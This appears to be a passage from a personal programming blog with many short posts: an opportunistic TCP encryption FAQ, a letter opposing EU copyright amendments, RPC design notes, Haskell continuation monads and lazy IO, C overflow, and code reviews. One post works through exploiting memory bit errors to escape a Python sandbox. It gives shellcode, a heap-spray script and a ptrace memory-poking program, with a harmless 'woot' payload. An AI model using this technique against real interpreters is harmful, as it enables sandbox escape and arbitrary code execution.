    It's additional CPU load, certainly. The Crypto++ and OpenSSL benchmarks suggest that a full core should be able to handle this at 1 Gbps. Most servers don't see anything like that traffic. Maybe more concerning is the DDoS possibility of using OTCP to force a server to do a 64-bit modexp with a single, unauthenticated packet. A very quick knock-up using the OpenSSL BN library suggests that a single Core2@2.33GHz can do about 50000 random generations and modexps per second. Since the keys are so small, I expect that a tuned implementation (using registers, not bigints) would be about 10x faster. You probably run out of bandwidth from all the SYNs before 500,000 SYNs per second maxes a single core (it's about 37MB/s). So SYN floods shouldn't be any more of a problem.

    Q: What about my high-performance network?

    I suggest that offering OTCP be disabled by default for private address ranges. Also, distributions probably won't turn it on for their "server" releases. If all else fails, it'll be a sysctl.

    Q: But then I'm wasting CPU time and packet space whenever I'm running SSH or HTTPS

    Right. Userland can turn off OTCP using a sockopt if it wishes, or it could just not enable itself for the default destination ports which these protocols use. (Again, that would be an ugly intrusion of default port numbers into the kernel, but this idea wasn't that beautiful to begin with.)

    Q: So, what's the plan?

    • Write a patch
    • Get it in the mainline
    • Badger distributions to compile it in with server support and client side off by default.
    • In time, get the client side offers turned on by default for "desktop" distributions
    • Save Internet

    Keyspan USB serial dongle drivers for amd64 Ubuntu 7.10

    Ubuntu doesn't ship with this driver, but it's useful: keyspan.ko

    To install, copy to /lib/modules/2.6.22-14-generic/kernel/drivers/usb/serial and depmod -a && modprobe keyspan (as root).

    I've just setup darcs.imp...

    I've just set up darcs.imperialviolet.org, mostly for myself (so that I can keep my laptop and home computer in sync), but also to serve anyone else's agl code needs.

    Maybe there's something t...

    Maybe there's something to this democracy lark after all:

    You will be pleased to know that this amendment was deleted from the
    voting list, thus we did not vote on it. The price of liberty is eternal
    vigilance!

    That's from Thomas Wise. Now I'm not a fan of UKIP - but I'm quite happy with this.

    Also, see comments on the BoingBoing story about this win

    I've had a section here c...

    I've had a section here called Letters I've written to my MP for ages. I've not really had an MP for a while now so it's dried up a little. But fear not, stupidity hasn't left politics! Danny from the EFF alerts us to more stupidity (stupidity in bold) from the EU. However, I don't have time to get a physical letter there before the vote, so an email will have to do.

    Dear Sir,

    I find myself dismayed to read the proposed amendments, numbered 80 and 82 (paragraph 9a) in the Guy Bono report which I believe comes to the vote on Tuesday. This text is replete with misunderstandings which are sadly all too common.

    Amendment 80 proposes legislative action to put the burden of copyright infringement on Internet Service Providers by compelling them to use filtering technologies. Thankfully I don't need to hypothesise about the consequences of this since this experiment has already been attempted in the United States in the 1998 Digital Millennium Copyright Act (DMCA). Despite protections which are probably in excess of what the proposers of this amendment would consider reasonable, the DMCA has led to a culture of censorship where risk-averse ISPs are quick to remove any claimed potential liability and then have no incentive to reconsider that decision. As a short example, the Church of Scientology has repeatedly[1] used the DMCA to hamper the work of those claiming that it's a dangerous cult - a view shared by the German government for one.

    Amendment 82 shows a gross misunderstanding of copyright law as demonstrated by language like "artists who risk seeing their work fall within the public domain in their lifetime" and "consider the competitive disadvantage posed by less generous protection terms in Europe than in the United States". Both of these notions should have been put to rest by the generally excellent Gowers report[2]. The public domain is not a risk. Copyright is very much a temporary monopoly and the public domain is the expected, and correct, fate of copyrighted works. Gowers also notes that artists hardly benefit from the current excessive copyright term, let alone an even longer one. Also, the competitive advantage is that foreign rightsholders earn more by charging EU citizens for longer. The advantage exists, but it's not to the EU citizen.

    Please do your utmost to remove these paragraphs from the final report and thus save the CULT committee from ridicule.

    Thank you.

    Yours,

    Adam Langley

    [1] http://www.politechbot.com/p-03281.html
    [2] http://www.hm-treasury.gov.uk/independent_reviews/gowers_review_intellectual_property/gowersreview_index.cfm

    RPCA Semantics

    I'm currently writing an RPC layer in Haskell (and also in C since I expect that I'll need it). I'm using libevent's tagged datastructures (which is why you've seen Haskell support for that from me), however I'm not using evrpc for a number of reasons. Firstly, it uses HTTP as a transport. What troubles me about using HTTP directly as a transport layer is the in-order limits that it imposes. The server cannot deliver replies out of order, nor can it deliver multiple replies for a single request (at least, not with replies to other requests mixed in), nor can it send any unsolicited messages (e.g. lame-mode messages).

    Also, evrpc has no support for lameness, although that's fixable (modulo the HTTP issues). Because of all that I decided to roll my own, called RPCA (because I'm not sufficiently self-centered just to call it Network.RPC :)). I'm including part of the RPCA documentation below for comments.

    RPCA is an RPC system, but that's a pretty loose term covering everything from I2C messages to SOAP. So this is the definition of exactly what an RPCA endpoint should do.

    RPCA RPCs are request, response pairs. Each request has, at most, one response and every response is generated by a single request. That means, at the moment, no unsolicited messages from a server and no streaming replies.

    RPCs are carried over TCP connections and each RPC on a given connection is numbered by the client. Each RPC id must be unique over all RPCs inflight on that TCP connection. (Inflight means that a request has been sent, but the client hasn't processed the reply yet.) A reply must come back over the same TCP connection as the request which prompted it. If a TCP connection fails, all RPCs inflight on that connection also fail.
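
    The inflight rules above can be sketched in a few lines of Python. This is only an illustration, not the RPCA code: the Connection class, its method names and the 32-bit id space are all assumptions made for the example.

```python
class Connection:
    """Tracks the RPCs inflight on one (hypothetical) TCP connection."""

    ID_SPACE = 2**32  # assumed width of an RPC id

    def __init__(self):
        self.next_id = 0
        self.inflight = {}  # RPC id -> callback awaiting the reply

    def send_request(self, callback):
        # Pick an id that is unique among the RPCs currently inflight.
        while self.next_id in self.inflight:
            self.next_id = (self.next_id + 1) % self.ID_SPACE
        rpc_id = self.next_id
        self.next_id = (self.next_id + 1) % self.ID_SPACE
        self.inflight[rpc_id] = callback
        return rpc_id

    def handle_reply(self, rpc_id, payload):
        # The RPC stops being inflight once the client processes the reply.
        callback = self.inflight.pop(rpc_id)
        callback(("ok", payload))

    def fail(self):
        # A failed connection fails every RPC that was inflight on it.
        pending, self.inflight = self.inflight, {}
        for callback in pending.values():
            callback(("connection-failed", None))


results = []
conn = Connection()
first = conn.send_request(results.append)
second = conn.send_request(results.append)
conn.handle_reply(first, b"pong")
conn.fail()
print(results)
```

    Ids only need to be unique among inflight RPCs, so an id can be reused as soon as its reply has been processed.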

    An RPC request or reply is a pair of byte strings. The first is the header, which is specific to RPCA. The only part of the header which applications need be concerned with is the error code in the reply header. The second is the payload (either the arguments in the case of a request, or the result in the case of a reply). This may be in any form of the application's choosing, but it's expected that it'll be a libevent tagged data structure.

    An RPC is targeted at a service, method pair. A server can export many services but each must have a unique name on that server. (A server is a TCP host + port number.) Each service can have many methods, the names of which need only be unique within that service.

    A Channel is an abstract concept on the client side of a way of delivering RPCs, and getting the replies back from a given server, service pair. It's distinct from a connection in that a Channel can have many connections (usually only one at a time, though) and that a Channel targets a specific service on a server.

    On a given server a service may be up, lame or down. There's no difference between a service which is down and a service which a server doesn't export. Services which are lame are still capable of serving requests, but are requesting that clients stop sending them because, for example, the server is about to shut down. When a service becomes lame it sends special health messages along all inbound connections to the server, so that clients may be asynchronously notified. (Note that health messages aren't RPCs so this doesn't contradict the above assertion that there are no unsolicited RPC replies.)

    If a Channel is targeted at a single server, service pair, then it's free to assume that the service is immediately up. If not, the server will set the error code in the RPC replies accordingly. If a Channel is load-balancing (i.e. it has multiple possible servers that a request could be routed to) it must wait to perform a health check before routing any requests to any server. A load-balancing Channel stops routing requests to any servers which report lameness.

    Note that lameness is a per-service value so that some services on a server may be lame while others are up.
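
    A load-balancing Channel, as described above, might look something like the following Python sketch. The class, the server names and the round-robin choice are assumptions for illustration; the text only requires that nothing is routed before a health check and that lame servers stop receiving requests.

```python
import itertools

UP, LAME, DOWN = "up", "lame", "down"


class LoadBalancingChannel:
    """Routes requests for one service across several servers."""

    def __init__(self, servers):
        # Health is unknown until a health check has been done, so no
        # server is routable at first.
        self.health = {server: None for server in servers}
        self._round_robin = itertools.count()

    def on_health_message(self, server, state):
        # Health messages may arrive at any time, not only as RPC replies.
        self.health[server] = state

    def pick_server(self):
        candidates = [s for s, h in self.health.items() if h == UP]
        if not candidates:
            raise RuntimeError("no healthy server known for this service")
        return candidates[next(self._round_robin) % len(candidates)]


channel = LoadBalancingChannel(["a:7000", "b:7000"])
channel.on_health_message("a:7000", UP)
channel.on_health_message("b:7000", UP)
channel.on_health_message("b:7000", LAME)  # b asks clients to stop sending
print(channel.pick_server())
```

    Because health is tracked per Channel, and a Channel targets one service, the same server can be lame for one service and up for another.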

    Recent Haskell work:binar...

    Recent Haskell work:

    So it's been really very ...

    So it's been really very quiet here for a while. Actually, it's been pretty much that way since I started at Google. A full time job takes up quite a lot of time and energy.

    Mostly my outside coding efforts have been going into Hackage recently (think of it as the Haskell CPAN). If this work would interest you, you probably already know about it.

    But what prompted me to write this was yet more about the semantic web. I think TBL's Weaving the Web and some of the various articulations are inspiring. Freebase is cool.

    But I still don't know when the RDF model became the start and end of semantic work. The RDF model says that the semantic world is a list of (subject, relation, object) triples. There are a bunch of semi-standards building on top of that, but I see little questioning of that basic model.

    But it just plain doesn't make sense to me. If we consider a triple to be an arc in a graph of objects, we know the starting and end points of the arc and we have the type of the arc (the relation). But I want to know over what time period that arc is valid. The triple (Adam Langley, lives-in, London) was valid for a few years but isn't now. Also I want to know who is asserting this arc, how sure are they etc. Maybe I want to say that someone has at-least some number of children.

    This results in a model something like [Arc] (getting back to Haskell here) where an arc is [(Attribute, Value)] (a key-value list). Without a start, end and type the arc is pretty much useless I'll admit, so those probably are required, but arcs need so much more.
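
    To make the shape of that model concrete, here is a minimal Python sketch of an arc as a key-value list with the three required attributes checked. The attribute names (valid-from, valid-to, asserted-by, confidence) and the example data are hypothetical, chosen only to illustrate the kinds of extra information mentioned above.

```python
from datetime import date

REQUIRED = ("start", "end", "type")


def make_arc(attributes):
    """Build an arc from (attribute, value) pairs, checking the required ones."""
    arc = dict(attributes)
    missing = [key for key in REQUIRED if key not in arc]
    if missing:
        raise ValueError(f"arc is missing {missing}")
    return arc


def valid_on(arc, day):
    """True if the arc's optional validity period covers the given day."""
    return arc.get("valid-from", date.min) <= day <= arc.get("valid-to", date.max)


# Entirely made-up example data.
lived_in = make_arc([
    ("start", "Alice"),
    ("type", "lives-in"),
    ("end", "Paris"),
    ("valid-from", date(2001, 1, 1)),
    ("valid-to", date(2004, 12, 31)),
    ("asserted-by", "example source"),
    ("confidence", 0.9),
])
print(valid_on(lived_in, date(2003, 6, 1)), valid_on(lived_in, date(2007, 6, 1)))
```

    A plain triple is then just the special case of an arc with no attributes beyond the required three.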

    Rant over.

    For reasons that I won't ...

    For reasons that I won't go into here, someone was asking me about running untrusted code in Python. Just as a musing, I came up with the following:

    Although you might be able to lock down a Python interpreter so that it wouldn't run any code that could do anything bad, you still have to remember that you're running on a real computer. All real computers go subtly wrong and introduce bit errors in memory. If you're very lucky, you'll find that your server has ECC memory, but that only reduces the number of bit errors.

    A Python object has a common header which includes a pointer to its type object. That, in turn, contains function pointers for some operations, like getattr and repr. If we have a pointer to a Python object, bit errors can move that pointer back and forth in memory. If we had lots of Python objects with payloads of pointers to a fake type object, we could hope that a bit error would push one of the pointers such that we can control the type object pointer.

    Let's start with a bit of position independent code that prints "woot" and exits the process:

      SECTION .text
      BITS 32
      mov edx, 5
      mov ebx, 1
      call next
      next:
      pop ecx
      add ecx, 21
      mov eax, 4
      int 0x80
      mov eax, 1
      int 0x80
      db "woot", 10

    Nasm that to t.out and we have our shellcode. Next, construct a Python script that amplifies bit errors in an array of pointers into an exploit:

      import struct
      import os
      import array
    
      # load the shellcode
      shellcode = file('t.out', 'r').read()
      # put it in an array
      shellarray = array.array('c', shellcode)
      # get the address of the array and pack it in a pointer
      shelladdress = struct.pack('I', shellarray.buffer_info()[0])
      # replicate that pointer lots into an array
      eviltype_object = array.array('c', shelladdress * 100)
      # and get the address of that and replicate into a string
      evilstring = struct.pack('I', eviltype_object.buffer_info()[0]) * 100
      # create lots of pointers to that string
      evillist = [evilstring] * 100000
      print os.getpid()
      # Call the repr function pointer for every element in evillist for ever
      while True:
        for x in evillist:
          repr(x)
          print 'ping'

    So, memory looks like this:

      [pointer pointer pointer ...]
          |       |       |
          V       V       V
      [String-header pointer pointer pointer]
                        |       |       |
                        V       V       V
      [pointer pointer ...  ]
          |       |
          V       V
      [shellcode            ]

    So the size of the first level gives us a window in which bit errors can turn into exploits. The size of the second level lets us capture more bit errors (we could also have a couple of strings, in the hope that they are next to each other on the heap, so that we can catch bit-clears too). How many bits of each 32-bit pointer can we expect to be useful? Well, it's probably reasonable to have a 128K evilstring, so that's 15 bits (since changing bits 0 and 1 will screw up our alignment). So, about half of them. To test the above, I cheated and wrote a bit-error-generator:

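    #include <stdlib.h>
    #include <sys/ptrace.h>
    #include <sys/types.h>
    #include <sys/wait.h>

    /* Arguments: the target pid, then the address of the pointer array. */
    int main(int argc, char **argv) {
        const int pid = atoi(argv[1]);
        const unsigned start = strtoul(argv[2], NULL, 0);
        ptrace(PTRACE_ATTACH, pid, NULL, NULL);
        wait(NULL);
        /* Read one pointer from the target, move it on by 32 bytes and write it back. */
        long v = ptrace(PTRACE_PEEKDATA, pid, (void *) start + 32, NULL);
        v += 32;
        ptrace(PTRACE_POKEDATA, pid, (void *) start + 32, (void *) v);
        ptrace(PTRACE_DETACH, pid, NULL, NULL);
        return 0;
    }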

    And here's the output:

    % python test.py
      0x80633f8
      30911
      0xB7C24F0CL
      ping
      ping
      woot

    Success!

    If you happen to want to ...

    If you happen to want to run industrial scale document scanners under Linux, I've just open sourced the (small) driver that you'll need: kvss905c on Google Code.

    Signed numbers don't overflow in C

    The title of this post is clearly daft; signed numbers are of a finite size so, of course they overflow. However, physical reality doesn't agree with the C standard which says that compilers can (and do) assume that overflow never happens. Take this, for example:

    int a, b;
    if (a > 0 && b > 0 && a + b > 0) foo();

    A compiler can remove the third test because it's redundant given the assumption that a + b cannot overflow.

    Clearly, this is pretty scary stuff and it's one of the reasons that I use unsigned everywhere. However, I'm very happy to read the GCC 4.2 change log to see the following:

    New command-line options -fstrict-overflow and -Wstrict-overflow have been added... With -fstrict-overflow, the compiler may assume that signed overflow will not occur, and transform this into an infinite loop. -fstrict-overflow is turned on by default at -O2, and may be disabled via -fno-strict-overflow. The -Wstrict-overflow option may be used to warn about cases where the compiler assumes that signed overflow will not occur. It takes five different levels: -Wstrict-overflow=1 to 5. See the documentation for details. -Wstrict-overflow=1 is enabled by -Wall.
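
    For comparison, a check that doesn't depend on wraparound can be written by rearranging the comparison so that nothing overflows in the first place. Python integers never overflow, so the sketch below only models the arithmetic; INT_MAX assumes a 32-bit int and the function name is made up for the example.

```python
INT_MAX = 2**31 - 1  # assuming a 32-bit int


def add_would_overflow(a: int, b: int) -> bool:
    """For positive a and b, report whether a + b would exceed INT_MAX.

    The test is written as a > INT_MAX - b, so no intermediate value can
    itself overflow. That is the form you would want to use in C.
    """
    assert a > 0 and b > 0
    return a > INT_MAX - b


print(add_would_overflow(INT_MAX, 1), add_would_overflow(1, 2))
```

    Written this way there is no overflowing expression for the compiler to reason about, so the test can't be optimised away on those grounds.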

    Continuation monads for state machines

    CPS (continuation-passing-style) is a code style which is often the result of the first step in compiling many Scheme like languages. Since I learned this stuff in Scheme, that's what I'm going to use in the beginning, switching to Haskell soon after.

    So here's a top level Scheme program

    (print (fact 10))

    Rather than return, each function gets a function in its argument list which is its continuation. It's the function for the rest of the program which takes the result of the current function. It's always a tail-call.

    (fact 10 (lambda (v) (print v #exit#)))

    So here, fact runs and calls its continuation with the result. This continuation is a function which prints the value and calls its continuation, which terminates the program.

    Easy, right?
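
    The same transformation can be sketched in Python, which may be easier to poke at than the Scheme. The function names here are made up for the example, and note that Python doesn't eliminate tail calls, so this only illustrates the style.

```python
def fact_cps(n, k):
    """Factorial in continuation-passing style: the result is passed to k."""
    if n == 0:
        return k(1)
    # The continuation of the recursive call multiplies by n, then carries on with k.
    return fact_cps(n - 1, lambda v: k(n * v))


def print_cps(v, k):
    """Print a value, then call the continuation for the rest of the program."""
    print(v)
    return k()


def exit_cps():
    """Stands in for #exit#: the continuation that ends the program."""
    return None


fact_cps(10, lambda v: print_cps(v, exit_cps))
```

    Every call is the last thing its caller does, which is what makes each one a tail call.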

    So here's a continuation monad in Haskell; but a quick motivation first. What this will give us is something like a Python generator, but which we can pass values in to. So it's a state machine, but without the inverted flow of control and without threads.

    newtype M o a = M ((a->o)->o)
    instance Monad (M o) where
      return x = M (\c -> c x)
      (M g)>>=f = M (\c -> g (\a -> let M h = f a in h c))
    

    Here, o is the output type (the type of the values which are yielded) and a is the input type. The monad itself is a wrapper around a function of type ((a->o)->o) - a function which takes a continuation and returns the output type of that continuation. The bind method is pretty scary, but I can't explain it any better here than the code already does - I'll just end up using more letters to say the same thing. (I have to work it through every time I read it anyway.)

    Now we need a couple of helper functions, but first the example: we're going to build a lightswitch which takes three commands: set (with a Bool value), toggle and query:

    data Result a = NewState (a->Result a) | Value Bool (a->Result a) | Final
    data Input = Set Bool | Toggle | Query

    So all our commands have to yield a value of type Result, querying will return a Value and the other two will return a NewState (which isn't really a result, it just gives the new continuation of the system). Final is there to be the value marking the end of the stream (it doesn't contain a next continuation).

    yield x = M (\c -> Value x c)
    wait = M (\c -> NewState c)

    These functions are how we yield values. Both are values in M which take a continuation and return a Result which passes that continuation back to the caller.

    runM cm = \x -> let (M f) = cm x in f (\c -> Final)

    This is a function which takes a first input, applies it to something which results in a continuation monad, unwraps that monad and gives it the final continuation, one which eats its given continuation and gives Final.

    lightswitch state v = do
      case v of
        Set state -> wait >>= lightswitch state
        Toggle -> wait >>= lightswitch (not state)
        Query -> yield state >>= lightswitch state

    This is our lightswitch, it takes an initial state and an Input and updates its state accordingly and returns some Result using either yield or wait. It recurses forever.

    step cont = do
      line <- getLine
      case line of
        "toggle" -> case cont Toggle of NewState cont' -> step cont'
        "query" -> case cont Query of Value x cont' -> putStrLn (show x) >> step cont'
        _ -> putStrLn "?" >> step cont

    Here's the code that uses the state machine. It's in the IO monad and runs a little command line where you can type in commands and see the results:

    toggle
    query
    True
    toggle
    query
    False

    It takes a continuation (which is the state of the state machine) and applies an Input to it to get another continuation (state of the machine). You can, of course, keep around any of these states and "undo" something by using an older state.

    And to tie it all together:

    main = step $ runM $ lightswitch False

    We pass False as the initial state of the system and use runM to stick the final continuation on the end; then we have a continuation for the state machine and off we go.
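
    For readers who don't speak Haskell, the same idea can be approximated in Python with plain closures rather than a monad. This is a sketch of the concept, not a translation of the code above: each state of the machine is a function which takes one input and returns an output together with the next state.

```python
def lightswitch(state):
    """Return a continuation: a function from one input to (output, next)."""
    def step(command, value=None):
        if command == "set":
            return None, lightswitch(value)
        if command == "toggle":
            return None, lightswitch(not state)
        if command == "query":
            return state, lightswitch(state)
        raise ValueError(command)
    return step


machine = lightswitch(False)
_, after_toggle = machine("toggle")
answer, _ = after_toggle("query")      # ask the toggled machine
old_answer, _ = machine("query")       # the older state is still usable
print(answer, old_answer)
```

    Keeping hold of machine after toggling is the "undo" mentioned above: the old continuation still describes the switch as it was.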

    Hopefully that made some kind of sense. To give credit where it's due: I stole the bind method (and motivation) from this paper.

    The science of fault finding

    When bad things happen, it's a science tracking them down. I had a big one today and I've been thinking about how I go about it (in the hope that I can go about it faster in the future).

    A fault/failure has a chain of events from the thing that changed to the thing that failed to the signal that let you know that something was wrong. Sometimes the failure and the signal are the same thing (what failed? It crashed. What's the signal? It crashed). And sometimes the thing that changed is the same as the thing that failed (what changed? The O-ring seal burst. What failed? The O-ring). The difference between the thing that changed and the thing that failed is that the latter is the first thing in the chain of events which you can make a value judgment about. Change happens, but failure is bad.

    In the system I'm dealing with we have many, many (many) signals about what's going on. Lots of those signals changed today. Some of them don't have value judgments; they aren't saying that anything is wrong, just that something is different. The chain of events has many branches and not all of them cause anything bad. However, several important indicators (error rate, latency) do have value judgments and they were creeping up.

    Now begins the science: have ideas, test them out. You can start from both ends of the chain; trying to figure out what changed and trying to work back from the signals. Since this was affecting the whole world there was one very obvious thing that changed at about the right time, but there were several other possibilities. Someone went off to investigate the other possibilities but mostly we concentrated on the big change, although we had no idea how it could have caused a problem.

    Now, at this point I think it would have been helpful to scribble on a whiteboard or on paper to record our facts about the problem. Otherwise you spill working memory and you forget why you discounted ideas. I'm very much thinking of something like the differential meetings in House (the TV show).

    However, I'm mostly thinking about how it took so many people so long to figure out where the failure was. In hindsight, we had all the clues needed fairly quickly and I even knew that they were important because I kept looking at the two signals which turned out to be critical. Neither were out of range, but they told contradictory states of the world. If you had tracked me down in the corridor and asked “How can both A and B be true?” I could have told you pretty quickly. But for some reason I was looking for other factors which could influence the more indirect of the signals. It didn't help that I didn't know the system all that well, but I still should have worked through the logic assuming that they were correct first and not taken 20 minutes to do so.

    Of course, everything is obvious in hindsight, but I still feel that I've missed the lesson somewhere here. Maybe I just need to start writing things down when I get into that state. It's similar to explaining something to someone; it helps you organise your thoughts too. I guess I'll see how that goes next time.

    Ian has launched Thoof, a...

    Ian has launched Thoof, a bookmarking service with a smart recommendation engine. He probably doesn't want a /.'ing right now, but I'm sure that IV's readership load isn't going to cause too many issues.

    [NYTimes on Thoof]

    The good and bad of code reviews in a large organisation

    I write this slightly out of anger/pain - I've had two patches get screwed up by code reviews today, but there are two sides to every code review...

    The aim of code reviews is fairly obvious: if your code can't stand up to being reviewed it probably doesn't belong in the code base. There are some obvious downsides too; the amount of time that they take is the most common one that I hear.

    However, there are some other downsides too. The code review is the most error-prone part of the patch writing process. When you're actually writing the patch you are fully engaged with the structure of the code - what you're writing is probably correct and testing mostly catches the rest.

    However, in the code review you're constantly in interrupt mode. A reply comes in and you make changes/answer the points in the reply and send it back. Every iteration is dangerous because you're context switching in and out.

    This can be made worse if the reviewer is picking out stupid things: like changing an unsigned to an int (it was the length of a list, unsigned was correct). However, if it's someone else's code, or even if it's just been a long day, you might give in and not bother arguing.

    If the two parties know each other, the probability of a dangerous, picky review is reduced for the same reason that communication of all forms generally works better when people actually know each other. Bad reviews also arise when there's a big organisational difference between the two (because no-one is going to tell a senior engineer that they are a crap reviewer).

    Of course, testing often saves the day here, but this is C++ and not everything tests easily. (In fact, very little tests easily unless test friendliness was a major facet of the original design). Inevitably, people don't run all the (probably pretty manual) tests after every little change and they just make that one last requested change and submit to get the damn thing done before lunch. (That would have been me today - the error wasn't a big deal at all, but it wouldn't have happened without the code review.)

    Code reviews also kill all minor changes. No one fixes typos or slightly bad comments because the effort of getting the review is too much. The barrier is such that a whole class of patches never happen.

    One patch of mine today (I vaguely know the reviewer) got slightly better in one part and slightly worse in another because I could deny the requests which were wrong or silly, but didn't do that with enough vigor. The other (don't know the reviewer and they are very senior) got worse in almost every respect.

    This is not to say that I don't think that code reviews are a good idea. I think some form is needed in a large code base. But they can easily be not just costly, but dangerous, unless done right.

    This code isn't ready to ...

    This code isn't ready to be a Hackage package yet, it's not nearly as capable as I'd want, but it works: NearestNeighbour2D. It lets you efficiently find the point in a set of 2D points which is closest to a given point. The limitation is that the tree building isn't incremental at all.

    Lazy lists for IO

    I have somewhat mixed feelings about using lazy lists in Haskell for IO. As a quick introduction - there is a technique in Haskell which lets you write pure functional code which processes a stream (lazy list) of data and have that stream of data be read/written on demand. This lets you write very neat stuff like:

    BSL.interact (BSL.map ((+) 1))

    which will, with the correct imports, read chunks of bytes from stdin, add one to each byte (with overflow) and write the chunks back to stdout.
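
    For readers more at home in Python, a rough analogue is sketched below. The interact and add_one functions are made-up names for this example; chunks are read on demand, transformed and written straight out, with each byte wrapping from 255 to 0.

```python
import io


def interact(transform, stdin, stdout, chunk_size=4096):
    """Read chunks on demand, transform each one and write it straight out."""
    for chunk in iter(lambda: stdin.read(chunk_size), b""):
        stdout.write(transform(chunk))


def add_one(chunk: bytes) -> bytes:
    # Add one to every byte, wrapping 255 around to 0.
    return bytes((b + 1) % 256 for b in chunk)


# In-memory streams stand in for stdin and stdout here.
source = io.BytesIO(b"HAL\xff")
sink = io.BytesIO()
interact(add_one, source, sink)
print(sink.getvalue())
```

    Unlike the Haskell version, the laziness here is explicit in the loop, which is also where any error handling would have to go.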

    Now, in one sense this is beautiful, but it really limits the error handling, which is where my mixed feelings come from. Nonetheless, I just used it in some code and it did lead to really nice code.

    I was writing a very simple IRC bot. I need it to monitor a channel and pick out certain messages. These messages come from the paging system and happen when something goes wrong. I then pipe them out to dzen and have them appear in the middle of the screen.

    To do this I wrote a pure functional IRC client which isn't in the IO monad and is typed like this:

    data IRCEvent = IRCLine String
                    deriving (Show)
    data IRCMessage = IRCMessage String String String | IRCCommand String | IRCTerminal | IRCError String
                      deriving (Show)
    ircSnoop :: [IRCEvent] -> [IRCMessage]

    Think about what an IRC client would be if it were an element in a dataflow graph. It gets a stream of lines from the server and produces two streams: a stream of data to send to the server (joining channels, replying to pings etc) and a stream of results (events from the paging system in this case). Here, IRCEvent is the type of the input stream. It's a type because I originally had extra input events (join/part a channel etc), but I removed them and lines from the server are all that remains. The two output streams are merged into one and separated by type; so the output stream has to be tee'ed, partly going back to the IRC server and partly to the logic which figures out if the message is important and showing it if it is.

    The code to reply to the IRC server:

    ircWrite handle ((IRCCommand line):messages) = do
      hPutStrLn handle (line ++ "\r")
      hFlush handle
      ircWrite handle messages
    ircWrite handle (x:messages) = unsafeInterleaveIO (ircWrite handle messages) >>= return . ((:) x)

    In the case of an IRCCommand result, we write it to the server and loop. Otherwise, we return the element of the list and process the rest. Note the use of unsafeInterleaveIO because otherwise we would write this equation:

    ircWrite handle (x:messages) = do
      rest <- ircWrite handle messages
      return (x : rest)

    However, that wouldn't produce any results until we hit the end of the messages list. unsafeInterleaveIO lets us return a result and only perform an IO action when the value is forced.
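
    The closest Python analogue to this on-demand behaviour is a generator. The sketch below is an illustration of the idea rather than a port: irc_write and the (kind, text) message shape are assumptions, and send stands in for whatever writes a line to the server.

```python
def irc_write(send, messages):
    """Send commands as a side effect and lazily yield everything else.

    `messages` is any iterable of (kind, text) pairs; `send` is a
    hypothetical callable that writes one line to the server.
    """
    for kind, text in messages:
        if kind == "command":
            send(text + "\r\n")
        else:
            yield kind, text


sent = []
stream = irc_write(sent.append, iter([
    ("command", "PONG :x"),
    ("message", "disk full"),
    ("command", "JOIN #ops"),
]))
first = next(stream)
print(first, sent)
```

    Only the commands before the first message have been sent at this point; the JOIN isn't written until the consumer asks for the next element, which mirrors how the IO is deferred until the rest of the list is forced.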

    So, this works really well in this case. The IRC protocol handling is very clean and it's very little code to do quite a lot. So in this case, lazy IO works. I don't have a good example of where it doesn't right now, but when I hit one I'll write it up.

    I had need of an LRU data...

    I had need of an LRU data structure in Haskell: LRU-0.1

    RDF searching

    You may have seen the recent news about an RDF breakthrough (this even hit non-tech media). Well, the paper is here and is worth a read. It's not actually a terribly well written paper and you'll need to read the paper on the index structure to get what's going on.

    Personally, I would have broadcast the requests to all the index servers because hashing to buckets makes resizing the number of buckets very hard. Also, I'm not sure about their data flow for joining sets. But that's fairly minor.

    If you liked those, try the paper on ranking too.

    Of course, this begs the question of how RDF will ever be useful for anything - because it isn't at the moment and it's been around a while. I'm not going into that now.

    (and, if you needed any more reason to switch to Xmonad from ion, see these recent comments from the author)

    Anyone interested in pro...

    Anyone interested in programming languages should watch this video of my colleague, Phil Gossett, talking about isomorphisms between types and code.

    Oh yes, and Spiderman 3 is terrible, avoid it.

    I have a new window manag...

    I have a new window manager and it works great. There are a couple of minor bugs (my gvim window runs a little off the bottom of the screen), but it's only the first release.

    (although readers should note that I've used ion for years so the switch to Xmonad may be a little more jarring for some.)

    And while I'm typing, I just want to say how spot on Ed Felten is in this post where he talks about the (increasingly loud) chatter about a “clean slate” design for the internet. While we're talking about things which will probably never happen, check out ipv6porn (don't mind the domain name, it's perfectly safe for work).

    Why you should believe John

    I said a couple of weeks ago that I'd write up one of the contradictions which come from believing in Egan-esque consciousness. (Just to recap, that means that you don't think there is anything magic about physical brains which precludes them running, in simulation, on a computer. Thus you're happy with uploads and all that other good stuff.)

    Let me be running a discrete time simulation of your brain on a computer. At some time t you are in state s. I simulate you by running an update function which maps s to s+1, based on some input (vision etc) and produces some side channel outputs (your movement etc).

    Now, it's a computer. I can simulate two people and each will run at half the speed. It doesn't matter that the process which is simulating your brain gets time sliced out for a few hundred milliseconds - it doesn't affect the computation at all.

    So, in the middle of calculating s+1 I can go off and do other work so long as I get there in the end. It appears to you that the rest of the world is speeding up (because you are slowing down).

    So I can just treat your state vector as a huge number and increment it with overflow. There is a lot of other computation which will occur before we hit s+1, but we will hit it. If we keep going we will reach s+2 and so on.

    However, every single being with a state vector less than, or equal, to yours in length will live every possible life while we do it.
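
    The argument is easy to play with at toy scale. In the Python sketch below the "brain" is only 8 bits wide and the two states are arbitrary made-up values standing in for s and its successor s+1; the point is just that a plain counter with overflow gets from one to the other, and passes through every other state of that width on a full cycle.

```python
def step_counter(state: int, bits: int) -> int:
    """Treat the state vector as a number and increment it with overflow."""
    return (state + 1) % (1 << bits)


def increments_until(start: int, target: int, bits: int) -> int:
    """Count how many increments it takes to get from start to target."""
    steps, state = 0, start
    while state != target:
        state = step_counter(state, bits)
        steps += 1
    return steps


BITS = 8                              # a toy 8-bit state vector
s, s_next = 0b10110010, 0b00010111    # hypothetical states s and s+1
print(increments_until(s, s_next, BITS))
```

    For a state vector of n bits the counter needs at most 2^n - 1 increments to reach the next real state, which is hopeless in practice but doesn't affect the argument.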

    That's certainly a little odd.

    Seems I'm right to hate Powerpoint

    As you'll see from my STM talk (see last post), or any other time you might have seen me talk, I try not to put words on slides. When I talk you have to listen to me; I might talk about code examples or graphs on slides, but I don't try to bullet point everything I'm going to be saying. I've never liked it because I don't like to listen to talks which have it (I usually feel that it stunts the presenter as they fall back on sticking too closely to the slides).

    But it seems that I'm right: “Research points the finger at PowerPoint” (via The Register)

    Software transactional memory talk

    You can see me giving a talk on STM (specifically the GHC implementation) at Google. I wasn't actually very happy with this talk - I didn't feel like the audience really got it and that's my fault since they were plenty smart enough. I guess I should have taken more time at the beginning to get everyone up to speed before diving into the examples. It's very tough, once you know something, to remember the steps that you took to understand it. And, even if you chart them, that doesn't mean that the same steps will work for anyone else.

    Still waiting in that room?...

